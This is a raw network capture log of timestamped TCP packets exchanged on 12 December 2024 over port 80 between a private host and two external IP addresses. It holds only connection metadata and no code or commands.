                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.812720060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.812804937 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.813802004 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.813930988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.814042091 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.814706087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.814714909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.814805984 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.815785885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.815804958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.815968037 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.816667080 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.817040920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.817548037 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.817830086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.817837000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.817926884 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.818742037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.818825006 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.818921089 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.819720030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.819950104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.820092916 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.820820093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.820923090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.821041107 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.821736097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.822809935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.822817087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.822823048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.822911024 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.823769093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.823956966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.824016094 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.824836969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.825150967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.825270891 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.825839043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.826739073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.826798916 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.826865911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.826872110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.826910019 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.827837944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.827918053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.827982903 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.828906059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.829015017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.829068899 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.829917908 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.830905914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.830915928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.831011057 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.831017017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.831715107 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.831909895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.832355022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.832469940 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.832966089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.834055901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.834065914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.834074020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.834173918 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.834925890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.835216999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.835325956 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.835984945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.837033033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.837107897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.837117910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.837189913 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.838104963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.838645935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.838824987 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.839047909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.839107037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.839379072 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.840078115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.841073036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.841084957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.841109991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.841228008 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.842056036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.842398882 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.842539072 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.843071938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.843346119 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.843394995 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.844073057 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.844127893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.844207048 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.845046997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.845302105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.845652103 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.846086025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.872534990 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.872620106 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.872821093 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.900355101 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.945157051 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.945269108 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.945499897 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.949383020 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.950588942 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.951105118 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.957830906 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.957921028 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.958161116 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.966186047 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.966747999 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.966967106 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.974695921 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.975764036 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.975830078 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.976011992 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.983264923 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.983429909 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.983598948 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.985975027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.985991955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.986155033 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.986409903 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.986588001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.986634970 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.987466097 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.988023996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.988447905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.988580942 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.988877058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.989460945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.989578009 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.990330935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.990411043 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.990478992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.991456985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.991553068 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.991576910 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.991592884 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.991612911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.991631031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.991679907 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.991910934 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.992657900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.992799997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.993712902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.993803024 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.994748116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.994756937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.994764090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.994822025 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.995619059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.995882988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.996576071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.997181892 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.997627020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.997637033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.997656107 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.997709990 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.998574018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.999267101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.999665976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.999669075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.999677896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.999747992 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.999846935 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.999856949 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:45.999905109 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.000685930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.001710892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.001718044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.001739025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.001811981 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.001858950 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.002636909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.002840996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.002897978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.003729105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.003926992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.004028082 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.004694939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.004772902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.005770922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.005781889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.005872011 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.006710052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.007119894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.007265091 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.007776976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.007790089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.007839918 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.008296013 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.008358002 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.008534908 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.008591890 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.008727074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.008922100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.009900093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.009968042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.010036945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.010749102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.010917902 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.011823893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.011838913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.011848927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.011900902 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.012793064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.013978958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.013999939 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.014082909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.014187098 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.014842987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.015113115 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.015155077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.015841007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.015907049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.015949965 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.016679049 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.016849041 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.016860962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.016870022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.016916037 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.016918898 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.017863035 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.018136978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.018923044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.018937111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.018968105 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.018990993 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.020162106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.020235062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.020278931 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.021071911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.021087885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.021218061 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.022129059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.022141933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.022253036 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.023035049 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.024014950 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.024035931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.024041891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.024096012 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.024441004 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.024517059 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.024580956 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.025033951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.025487900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.026084900 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.026124001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.026230097 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.027048111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.027057886 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.027157068 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.028006077 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.028090000 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.028244972 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.029011011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.029959917 CET8049946185.81.68.147192.168.2.10
